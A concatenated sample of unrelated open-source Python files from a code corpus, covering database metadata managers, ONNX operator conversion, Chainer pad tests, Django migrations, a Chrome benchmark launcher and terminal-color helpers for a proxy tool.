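        assert itp.binary_interpolant(None, None) is None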
|
src/DataJoin/manager/data_managers.py
|
huangwei19/9nfl
| 103 |
122305
|
# Copyright 2020 The 9nFL Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
from DataJoin.utils.base import current_timestamp
from DataJoin.db.db_models import DB, DataBlockMeta, DataSourceMeta, DataSource
import logging
class DataManagers(object):
def __init__(self, block_id: str = None, partition_id: str = None, file_version: int = None,
data_source_name: str = None,
dfs_data_block_dir: str = None,
dfs_raw_data_dir: str = None,
data_source_role: int = None,
data_source_state: int = None):
self.block_id = block_id
self.partition_id = partition_id
self.file_version = file_version
self.data_source_name = data_source_name
self.dfs_data_block_dir = dfs_data_block_dir
self.dfs_raw_data_dir = dfs_raw_data_dir
self.data_source_role = data_source_role
self.data_source_state = data_source_state
def save_data_block_meta_info(self, data_block_meta_info, create=False):
with DB.connection_context():
logging.info(
'save {} {} data_block_meta: {}'.format(self.block_id, self.partition_id, data_block_meta_info))
data_block_metas = DataBlockMeta.select().where(DataBlockMeta.block_id == self.block_id)
is_insert = True
if data_block_metas:
data_block_meta = data_block_metas[0]
is_insert = False
elif create:
data_block_meta = DataBlockMeta()
data_block_meta.create_time = current_timestamp()
data_block_meta.update_time = current_timestamp()
else:
return None
data_block_meta.block_id = self.block_id
data_block_meta.partition_id = self.partition_id
data_block_meta.file_version = self.file_version
for k, v in data_block_meta_info.items():
try:
if k in ['block_id', 'partition_id', 'file_version'] or v == getattr(DataBlockMeta, k).default:
continue
setattr(data_block_meta, k, v)
except:
pass
if is_insert:
data_block_meta.save(force_insert=True)
else:
data_block_meta.save()
def save_data_source_meta_info(self, data_source_meta_info, create=False):
with DB.connection_context():
logging.info(
'save {} data_source_meta: {}'.format(self.data_source_name, data_source_meta_info))
data_source_metas = DataSourceMeta.select().where(DataSourceMeta.block_id == self.block_id)
is_insert = True
if data_source_metas:
data_source_meta = data_source_metas[0]
is_insert = False
elif create:
data_source_meta = DataSourceMeta()
data_source_meta.create_time = current_timestamp()
data_source_meta.update_time = current_timestamp()
else:
return None
for k, v in data_source_meta_info.items():
try:
if k in ['data_source_name'] or v == getattr(DataSourceMeta, k).default:
continue
setattr(data_source_meta, k, v)
except:
pass
if is_insert:
data_source_meta.save(force_insert=True)
else:
data_source_meta.save()
def save_data_source_info(self, data_source_info, create=False):
with DB.connection_context():
logging.info(
'save {} data_source: {}'.format(self.data_source_name, data_source_info))
data_sources = DataSource.select().where(DataSource.block_id == self.block_id)
is_insert = True
if data_sources:
data_source = data_sources[0]
is_insert = False
elif create:
data_source = DataSource()
data_source.create_time = current_timestamp()
data_source.update_time = current_timestamp()
else:
return None
data_source.data_source_state = self.data_source_state
data_source.dfs_data_block_dir = self.dfs_data_block_dir
data_source.dfs_raw_data_dir = self.dfs_raw_data_dir
for k, v in data_source_info.items():
try:
if k in ['data_source_name'] or v == getattr(DataSource, k).default:
continue
setattr(data_source, k, v)
except:
pass
if is_insert:
data_source.save(force_insert=True)
else:
data_source.save()
|
data_structures/queues/array_based_queue.py
|
vinta/fuck-coding-interviews
| 590 |
122315
|
<gh_stars>100-1000
# coding: utf-8
class ArrayBasedQueue:
def __init__(self):
self.array = []
def __len__(self):
return len(self.array)
def __iter__(self):
for item in self.array:
yield item
# O(1)
def enqueue(self, value):
self.array.append(value)
# O(n)
def dequeue(self):
try:
return self.array.pop(0)
except IndexError:
raise ValueError('queue is empty')
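# Hedged usage sketch (editor addition): basic FIFO behaviour of the queue.
if __name__ == '__main__':
    queue = ArrayBasedQueue()
    for value in (1, 2, 3):
        queue.enqueue(value)
    assert len(queue) == 3
    assert queue.dequeue() == 1  # FIFO: the first value enqueued comes out first
    assert list(queue) == [2, 3]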
|
OSPatching/azure/servicemanagement/sqldatabasemanagementservice.py
|
shridpant/azure-linux-extensions
| 266 |
122355
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
from azure import (
MANAGEMENT_HOST,
_parse_service_resources_response,
)
from azure.servicemanagement import (
Servers,
Database,
)
from azure.servicemanagement.servicemanagementclient import (
_ServiceManagementClient,
)
class SqlDatabaseManagementService(_ServiceManagementClient):
    ''' Note that this class is preliminary work on SQL Database
    management. Since it lacks a lot of features, the final version
    can be slightly different from the current one.
'''
def __init__(self, subscription_id=None, cert_file=None,
host=MANAGEMENT_HOST):
super(SqlDatabaseManagementService, self).__init__(
subscription_id, cert_file, host)
#--Operations for sql servers ----------------------------------------
def list_servers(self):
'''
List the SQL servers defined on the account.
'''
return self._perform_get(self._get_list_servers_path(),
Servers)
#--Operations for sql databases ----------------------------------------
def list_databases(self, name):
'''
List the SQL databases defined on the specified server name
'''
response = self._perform_get(self._get_list_databases_path(name),
None)
return _parse_service_resources_response(response, Database)
#--Helper functions --------------------------------------------------
def _get_list_servers_path(self):
return self._get_path('services/sqlservers/servers', None)
def _get_list_databases_path(self, name):
# *contentview=generic is mandatory*
return self._get_path('services/sqlservers/servers/',
name) + '/databases?contentview=generic'
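# Hedged usage sketch (editor addition): listing the databases of one server.
# '<subscription-id>', 'path/to/management.pem' and 'myserver' are placeholders,
# and the '.name' attribute access is an assumption about the parsed Database
# entities.
if __name__ == '__main__':
    sms = SqlDatabaseManagementService('<subscription-id>', 'path/to/management.pem')
    for database in sms.list_databases('myserver'):
        print(database.name)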
|
paddle2onnx/op_mapper/sequence/im2sequence.py
|
AIpioneer/paddle2onnx
| 252 |
122367
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import numpy as np
from paddle2onnx.constant import dtypes
from paddle2onnx.utils import logging
from paddle2onnx.op_mapper import OpMapper as op_mapper
@op_mapper('im2sequence')
class Im2Sequence():
support_opset_verison_range = (1, 12)
@classmethod
def opset_1(cls, graph, node, **kw):
n, c, h, w = node.input_shape('X', 0)
        assert h > 0 and w > 0, "Only fixed input shapes are supported for the im2sequence operator."
stride_h, stride_w = node.attr('strides')
paddings = node.attr('paddings')
assert node.attr(
'out_stride'
) != 1, "Only out_stride==1 is supported for im2sequence operator."
h = h + paddings[0] + paddings[1]
w = w + paddings[1] + paddings[2]
kernel_h, kernel_w = node.attr('kernels')
out_h = 1 + (h - kernel_h + stride_h - 1) // stride_h
out_w = 1 + (w - kernel_w + stride_w - 1) // stride_w
h_steps = list()
for i in range(out_h):
h_steps.append([i * stride_h, i * stride_h + kernel_h])
w_steps = list()
for i in range(out_w):
w_steps.append([i * stride_w, i * stride_w + kernel_w])
slice_node_blocks = list()
for i in range(out_h):
for j in range(out_w):
starts_node = graph.make_node(
'Constant',
dtype=dtypes.ONNX.INT64,
dims=[4],
value=[0, 0, h_steps[i][0], w_steps[j][0]])
ends_node = graph.make_node(
'Constant',
dtype=dtypes.ONNX.INT64,
dims=[4],
value=[999999, 999999, h_steps[i][1], w_steps[j][1]])
slice_block_node = graph.make_node(
'Slice',
inputs=[node.input('X', 0), starts_node, ends_node])
flatten_block_node = graph.make_node(
"Flatten", inputs=[slice_block_node], axis=0)
                slice_node_blocks.append(flatten_block_node)
concat_block_node = graph.make_node(
"Concat",
inputs=slice_node_blocks,
outputs=node.output('Out'),
axis=0)
logging.info("==========Importance Notice===========")
logging.info(
"Since im2sequence operator is used in your paddlepaddle model, the translated onnx model only support input data with batch_size=1."
)
logging.info("======================================")
|
addons/bitbucket/tests/test_serializer.py
|
gaybro8777/osf.io
| 628 |
122371
|
<reponame>gaybro8777/osf.io
# -*- coding: utf-8 -*-
"""Serializer tests for the Bitbucket addon."""
import mock
from nose.tools import * # noqa (PEP8 asserts)
import pytest
from tests.base import OsfTestCase
from addons.bitbucket.api import BitbucketClient
from addons.bitbucket.tests.factories import BitbucketAccountFactory
from addons.bitbucket.serializer import BitbucketSerializer
from addons.base.tests.serializers import StorageAddonSerializerTestSuiteMixin
pytestmark = pytest.mark.django_db
class TestBitbucketSerializer(StorageAddonSerializerTestSuiteMixin, OsfTestCase):
addon_short_name = 'bitbucket'
Serializer = BitbucketSerializer
ExternalAccountFactory = BitbucketAccountFactory
client = BitbucketClient()
def set_provider_id(self, pid):
self.node_settings.repo = pid
|
tests/chainer_tests/functions_tests/array_tests/test_pad.py
|
zaltoprofen/chainer
| 3,705 |
122424
|
import numpy
from chainer import functions
from chainer import testing
@testing.parameterize(*testing.product_dict(
[
{'shape': (), 'pad_width': 1, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': 0, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': 1, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': (1, 2), 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': ((1, 2), (3, 4)), 'mode': 'constant'},
{'shape': (2, 3, 2), 'pad_width': ((2, 5), (1, 2), (0, 7)),
'mode': 'constant'},
{'shape': (1, 3, 5, 2), 'pad_width': 2, 'mode': 'constant'}
],
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64}
]
))
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
# ChainerX tests
+ testing.product({
'use_chainerx': [True],
'chainerx_device': ['native:0', 'cuda:0', 'cuda:1'],
})
)
class TestPadDefault(testing.FunctionTestCase):
def setUp(self):
self.check_backward_options = {}
if self.dtype == numpy.float16:
self.check_backward_options.update({'atol': 3e-2, 'rtol': 3e-2})
def generate_inputs(self):
x = numpy.random.uniform(-1, 1, self.shape).astype(self.dtype)
return x,
def forward(self, inputs, device):
x, = inputs
y = functions.pad(x, self.pad_width, self.mode)
return y,
def forward_expected(self, inputs):
x, = inputs
y_expected = numpy.pad(x, self.pad_width, self.mode)
return y_expected.astype(self.dtype),
@testing.parameterize(*testing.product_dict(
[
{'shape': (2, 3), 'pad_width': 1, 'mode': 'constant',
'constant_values': 1},
{'shape': (2, 3), 'pad_width': (1, 2), 'mode': 'constant',
'constant_values': (1, 2)},
{'shape': (2, 3), 'pad_width': ((1, 2), (3, 4)), 'mode': 'constant',
'constant_values': ((1, 2), (3, 4))},
],
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64}
]
))
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
# ChainerX tests
+ testing.product({
'use_chainerx': [True],
'chainerx_device': ['native:0', 'cuda:0', 'cuda:1'],
})
)
# Old numpy does not work with multi-dimensional constant_values
@testing.with_requires('numpy>=1.11.1')
class TestPad(testing.FunctionTestCase):
def setUp(self):
self.check_backward_options = {}
if self.dtype == numpy.float16:
self.check_backward_options.update({'atol': 3e-2, 'rtol': 3e-2})
def generate_inputs(self):
x = numpy.random.uniform(-1, 1, self.shape).astype(self.dtype)
return x,
def forward_expected(self, inputs):
x, = inputs
y_expected = numpy.pad(x, self.pad_width, mode=self.mode,
constant_values=self.constant_values)
return y_expected,
def forward(self, inputs, device):
x, = inputs
y = functions.pad(x, self.pad_width, mode=self.mode,
constant_values=self.constant_values)
return y,
testing.run_module(__name__, __file__)
|
digest/migrations/0041_auto_20160401_1403.py
|
PURNA-ROCK/pythondigest
| 124 |
122443
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-04-01 14:03
from __future__ import unicode_literals
import taggit_autosuggest.managers
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('digest', '0040_auto_20160330_1616'),
]
operations = [
migrations.AlterField(
model_name='item',
name='keywords',
field=taggit_autosuggest.managers.TaggableManager(blank=True,
help_text='A comma-separated list of tags.',
through='digest.KeywordGFK',
to='digest.Keyword',
verbose_name='Keywords'),
),
]
|
corehq/apps/users/migrations/0030_userhistory_user_upload_record.py
|
akashkj/commcare-hq
| 471 |
122474
|
# Generated by Django 2.2.24 on 2021-07-02 13:45
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('user_importer', '0001_initial'),
('users', '0029_userhistory'),
]
operations = [
migrations.AddField(
model_name='userhistory',
name='user_upload_record',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL,
to='user_importer.UserUploadRecord'),
),
]
|
tests/conftest.py
|
billvsme/videoSpider
| 216 |
122478
|
import pytest
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from models import Base
from config import create_new_sqla
from helpers import (get_video_douban_ids,
get_celebrity_douban_ids,
get_animation_bilibili_ids)
test_database_url = 'sqlite:///test.db'
@pytest.fixture(scope='session')
def session(request):
sqla = create_new_sqla(test_database_url, echo=False)
session = sqla['session']
engine = sqla['engine']
Base.metadata.create_all(engine)
def teardown():
Base.metadata.drop_all(engine)
request.addfinalizer(teardown)
return session
@pytest.fixture
def douban_movie_ids():
return list(get_video_douban_ids())
@pytest.fixture
def douban_celebrity_ids():
return list(get_celebrity_douban_ids())
@pytest.fixture
def bilibili_animation_ids():
return list(get_animation_bilibili_ids())
|
syzygy/scripts/test_bot/chrome_page_load.py
|
nzeh/syzygy
| 343 |
122493
|
#!python
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script for launching Chrome, having it load a set of pages, and then cleanly
shutting it down.
"""
# Standard modules.
import json
import optparse
import os
import sys
# Local modules.
import log_helper
# Modules from other locations in the repo.
_CUR_DIR = os.path.abspath(os.path.dirname(__file__))
_BENCHMARK_DIR = os.path.abspath(os.path.join(_CUR_DIR, '..', 'benchmark'))
_ETW_DB_DIR = os.path.abspath(os.path.join(_CUR_DIR, '..', '..', 'py',
'etw_db'))
_ETW_DIR = os.path.abspath(os.path.join(_CUR_DIR, '..', '..', '..',
'third_party', 'sawbuck', 'py', 'etw'))
sys.path.append(_BENCHMARK_DIR)
sys.path.append(_ETW_DB_DIR)
sys.path.append(_ETW_DIR)
import chrome_control
import runner
_LOGGER = log_helper.GetLogger(__file__)
def _ParseArgs():
"""Parses the command-line."""
parser = optparse.OptionParser(
'Usage: %prog [options] [url1 [url2 [ ... ]]]')
parser.add_option('--chrome-dir', help='Location of Chrome installation.')
parser.add_option('--iterations', default=1, type='int',
help='Number of iterations.')
parser.add_option('--url-list', help='File with list of URLs to be opened.')
opts, args = parser.parse_args()
if not opts.chrome_dir:
parser.error("Must specify --chrome-dir.")
return (opts, args)
def _GetUrlList(opts, args):
"""Gets the list of URLs to be loaded."""
urls = args
if opts.url_list:
_LOGGER.info('Loading list of URLs from \"%s\".', opts.url_list)
urls += open(opts.url_list, 'rb').readlines()
return urls
def main():
if sys.platform == 'win32':
# Don't show error dialog boxes on crashes or debug-breaks. This setting
# is inherited by child processes, so a crash won't block automated tests.
import ctypes
ctypes.windll.kernel32.SetErrorMode(3)
opts, args = _ParseArgs()
# Get the list of URLs and determine the startup type.
urls = _GetUrlList(opts, args)
startup_type = chrome_control.STARTUP_NEW_TAB_PAGE
if urls:
startup_type = chrome_control.STARTUP_RESTORE_SESSION
# Configure and launch the Chrome runner.
chrome_exe = os.path.abspath(os.path.join(opts.chrome_dir, 'chrome.exe'))
if not os.path.exists(chrome_exe):
raise Exception('File not found: %s' % chrome_exe)
chrome = runner.ChromeRunner(chrome_exe, None, True)
chrome.ConfigureStartup(startup_type, urls)
chrome.Run(opts.iterations)
return 0
if __name__ == '__main__':
sys.exit(main())
|
test/com/facebook/buck/features/python/testdata/python_binary/preload_deps/preload_order.py
|
Unknoob/buck
| 8,027 |
122520
|
import ctypes
ctypes.CDLL(None).func()
|
TransForm_Kit/DnsChannelpruning/channel_pruning.py
|
Abraham-Xu/TF2
| 144 |
122550
|
# Copyright 2019 Inspur Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import torch.nn as nn
import torch
import time
from parse_model import ParseModel
from find_dnscp_conv import *
from dnscp_core import DnscpCore
from utility import *
from model_convert import *
from finetune import validate
from finetune import train_val
''' dnscp train and val'''
def dnscp_train_val(train_loader, val_loader,model, InputShape,criterion, optimizer,args):
""" find connect layer! """
print('find connect layer begin...')
parse_model_instance = ParseModel()
layername_type_dict,layername_lainjie_dict = parse_model_instance.parse_model_caffe\
(model, InputShape, softmax = False)
print('find connect layer Done.')
""" find conv layer that needs to be pruned ! """
print('find pruned layer begin...')
conv_dnscp_flag_list = find_dnscp_conv(model,layername_type_dict,layername_lainjie_dict)
print('find pruned layer Done.')
print('conv_dnscp_flag:',conv_dnscp_flag_list)
print('train begin')
'''init dnscp core'''
net_dnscp = DnscpCore()
best_acc1 = 0
train_cp_stop_flag=False
is_best = False
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
adjust_learning_rate(optimizer, epoch, args)
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(
len(train_loader),
[batch_time, data_time, losses, top1, top5],
prefix="Epoch: [{}]".format(epoch))
'''switch to train mode'''
model.train()
end = time.time()
for i, (images, target) in enumerate(train_loader):
'''measure data loading time'''
data_time.update(time.time() - end)
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
'''forward dnscp layer'''
iter = i+len(train_loader)*epoch
conv_param_before_cplist,conv_param_cpmasklist = \
net_dnscp.forward_dnscp_layer(model,conv_dnscp_flag_list,iter)
'''model forward'''
output = model(images)
'''measure accuracy and record loss'''
loss = criterion(output, target)
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
''' compute gradient and do SGD step'''
optimizer.zero_grad()
loss.backward()
'''replace weight with cp before'''
conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
module.weight.data = conv_param_before_cplist[conv_index]
conv_index+=1
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0 or i % (len(train_loader)-1) == 0:
progress.display(i)
pruned_model = generate_prunedmodel(model,conv_dnscp_flag_list,conv_param_cpmasklist)
convparam_kept,convflops_kept = calculate_compress_rate(model,pruned_model,InputShape)
print("kept ratio:",convflops_kept)
'''control train epoch'''
'''if convflops_kept >= args.kept_ratio+0.2:
train_cp_stop_flag = True
if iter<10000:
print("please set kept ratio bigger than ",args.kept_ratio)
break'''
if iter % 2000 == 0:
pruned_model = generate_prunedmodel(model,conv_dnscp_flag_list,conv_param_cpmasklist)
convparam_kept,convflops_kept = calculate_compress_rate(model,pruned_model,InputShape)
'''evaluate on validation set'''
acc1 = dnscp_validate(val_loader, model, criterion, conv_param_cpmasklist,args)
if convflops_kept >= args.kept_ratio-0.05 and convflops_kept <= args.kept_ratio+0.05:
'''remember best acc@1 and save checkpoint'''
is_best = acc1 > best_acc1
best_acc1 = acc1
if not args.multiprocessing_distributed or (args.multiprocessing_distributed
and args.rank % ngpus_per_node == 0):
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'acc1': acc1,
'optimizer' : optimizer.state_dict(),
'mask':conv_param_cpmasklist,
'conv_cpflag':conv_dnscp_flag_list,
'kept_ratio':convflops_kept,
'iter':iter
}, is_best,args.snapshotmodelname)
is_best = False
if train_cp_stop_flag == True:
break
def dnscp_train(train_loader, model, criterion, optimizer, epoch,net_dnscp,conv_dnscp_flag,InputShape,args):
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(
len(train_loader),
[batch_time, data_time, losses, top1, top5],
prefix="Epoch: [{}]".format(epoch))
train_cp_stop_flag=False
'''switch to train mode'''
model.train()
end = time.time()
for i, (images, target) in enumerate(train_loader):
'''measure data loading time'''
data_time.update(time.time() - end)
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
'''compute output'''
iter = i+len(train_loader)*epoch
#print("iter:",iter)
'''conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
if conv_index == 2:
print("ith weight data:",module.weight.data.cpu().numpy()[0,0:16,:,:])
conv_index+=1'''
conv_param_before_cplist,conv_param_cpmasklist = net_dnscp.forward_dnscp_layer(model,conv_dnscp_flag,iter)
'''conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
if conv_index == 2:
print("ith mask weight data:",module.weight.data.cpu().numpy()[0,0:16,:,:])
conv_index+=1'''
output = model(images)
loss = criterion(output, target)
'''measure accuracy and record loss'''
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
'''replace weight with cp before'''
conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
'''if conv_index == 2:
print("optimizer i+1 weight data:",module.weight.data.cpu().numpy()[0,0:16,:,:])
print("grad:",module.weight.grad.cpu().numpy()[0,0:16,:,:])
print("before_update_mask weight data:",conv_param_before_cp[conv_index].cpu().numpy()[0,0:16,:,:])
print("before_update_mask weight data:",conv_param_before_cplist[conv_index].cpu().numpy()[0,0:16,:,:])'''
module.weight.data = conv_param_before_cplist[conv_index]
conv_index+=1
optimizer.step()
'''only print'''
'''conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
if conv_index == 2:
print("i+1 weight data:",module.weight.data.cpu().numpy()[0,0:16,:,:])
print("grad:",module.weight.grad.cpu().numpy()[0,0:16,:,:])
print("before_update_mask weight data:",conv_param_before_cplist[conv_index].cpu().numpy()[0,0:16,:,:])
#module.weight.data = conv_param_before_cplist[conv_index]-args.lr*module.weight.grad
conv_index+=1'''
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0 or i % (len(train_loader)-1) == 0:
progress.display(i)
pruned_model = generate_prunedmodel(model,conv_dnscp_flag,conv_param_cpmasklist)
convparam_kept,convflops_kept = calculate_compress_rate(model,pruned_model,InputShape)
print("kept ratio:",convflops_kept)
if convflops_kept >= args.kept_ratio+0.02:
train_cp_stop_flag = True
break
#if i % (len(train_loader)//2) == 0 or i == len(train_loader):
###end simple test
return conv_param_cpmasklist,train_cp_stop_flag,convflops_kept
def dnscp_validate(val_loader, model, criterion, conv_param_cpmasklist,args):
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(
len(val_loader),
[batch_time, losses, top1, top5],
prefix='Test: ')
# switch to evaluate mode
model.eval()
'''replace weight with weight*mask for forward'''
conv_index = 0
conv_param_nocp_list = []
for module in model.modules():
if isinstance(module,nn.Conv2d):
conv_param_nocp_list.append(module.weight.data)
#print(module.weight.data.shape,conv_param_cpmasklist[conv_index].shape)
module.weight.data = module.weight.data * conv_param_cpmasklist[conv_index]
conv_index+=1
with torch.no_grad():
end = time.time()
for i, (images, target) in enumerate(val_loader):
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
output = model(images)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.display(i)
# TODO: this should also be done with the ProgressMeter
print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
'''replace weight*mask with weight'''
conv_index = 0
for module in model.modules():
if isinstance(module,nn.Conv2d):
module.weight.data = conv_param_nocp_list[conv_index]
conv_index+=1
return top1.avg
|
tests/roots/test-ext-autodoc/target/empty_all.py
|
samdoran/sphinx
| 4,973 |
122571
|
"""
docstring of empty_all module.
"""
__all__ = []
def foo():
"""docstring"""
def bar():
"""docstring"""
def baz():
"""docstring"""
|
pappyproxy/colors.py
|
Jab2870/pappy-proxy
| 440 |
122580
|
<reponame>Jab2870/pappy-proxy
import re
import itertools
from pygments import highlight
from pygments.lexers.data import JsonLexer
from pygments.lexers.html import XmlLexer
from pygments.lexers import get_lexer_for_mimetype, HttpLexer
from pygments.formatters import TerminalFormatter
def clen(s):
ansi_escape = re.compile(r'\x1b[^m]*m')
return len(ansi_escape.sub('', s))
class Colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
# Effects
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# Colors
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
MAGENTA = '\033[35m'
CYAN = '\033[36m'
WHITE = '\033[37m'
# BG Colors
BGBLACK = '\033[40m'
BGRED = '\033[41m'
BGGREEN = '\033[42m'
BGYELLOW = '\033[43m'
BGBLUE = '\033[44m'
BGMAGENTA = '\033[45m'
BGCYAN = '\033[46m'
BGWHITE = '\033[47m'
# Light Colors
LBLACK = '\033[90m'
LRED = '\033[91m'
LGREEN = '\033[92m'
LYELLOW = '\033[93m'
LBLUE = '\033[94m'
LMAGENTA = '\033[95m'
LCYAN = '\033[96m'
LWHITE = '\033[97m'
class Styles:
################
# Request tables
TABLE_HEADER = Colors.BOLD+Colors.UNDERLINE
VERB_GET = Colors.CYAN
VERB_POST = Colors.YELLOW
VERB_OTHER = Colors.BLUE
STATUS_200 = Colors.CYAN
STATUS_300 = Colors.MAGENTA
STATUS_400 = Colors.YELLOW
STATUS_500 = Colors.RED
PATH_COLORS = [Colors.CYAN, Colors.BLUE]
KV_KEY = Colors.GREEN
KV_VAL = Colors.ENDC
UNPRINTABLE_DATA = Colors.CYAN
def verb_color(verb):
if verb and verb == 'GET':
return Styles.VERB_GET
elif verb and verb == 'POST':
return Styles.VERB_POST
else:
return Styles.VERB_OTHER
def scode_color(scode):
if scode and scode[0] == '2':
return Styles.STATUS_200
elif scode and scode[0] == '3':
return Styles.STATUS_300
elif scode and scode[0] == '4':
return Styles.STATUS_400
elif scode and scode[0] == '5':
return Styles.STATUS_500
else:
return Colors.ENDC
def path_formatter(path, width=-1):
if len(path) > width and width != -1:
path = path[:width]
path = path[:-3]+'...'
parts = path.split('/')
colparts = []
for p, c in zip(parts, itertools.cycle(Styles.PATH_COLORS)):
colparts.append(c+p+Colors.ENDC)
return '/'.join(colparts)
def color_string(s, color_only=False):
"""
    Return the string with a color/ENDC. The same string will always be the same color.
"""
from .util import str_hash_code
# Give each unique host a different color (ish)
if not s:
return ""
strcols = [Colors.RED,
Colors.GREEN,
Colors.YELLOW,
Colors.BLUE,
Colors.MAGENTA,
Colors.CYAN,
Colors.LRED,
Colors.LGREEN,
Colors.LYELLOW,
Colors.LBLUE,
Colors.LMAGENTA,
Colors.LCYAN]
col = strcols[str_hash_code(s)%(len(strcols)-1)]
if color_only:
return col
else:
return col + s + Colors.ENDC
def pretty_msg(msg):
to_ret = pretty_headers(msg) + '\r\n' + pretty_body(msg)
return to_ret
def pretty_headers(msg):
to_ret = msg.headers_section()
to_ret = highlight(to_ret, HttpLexer(), TerminalFormatter())
return to_ret
def pretty_body(msg):
from .util import printable_data
to_ret = printable_data(msg.body, colors=False)
if 'content-type' in msg.headers:
try:
lexer = get_lexer_for_mimetype(msg.headers.get('content-type').split(';')[0])
to_ret = highlight(to_ret, lexer, TerminalFormatter())
except:
pass
return to_ret
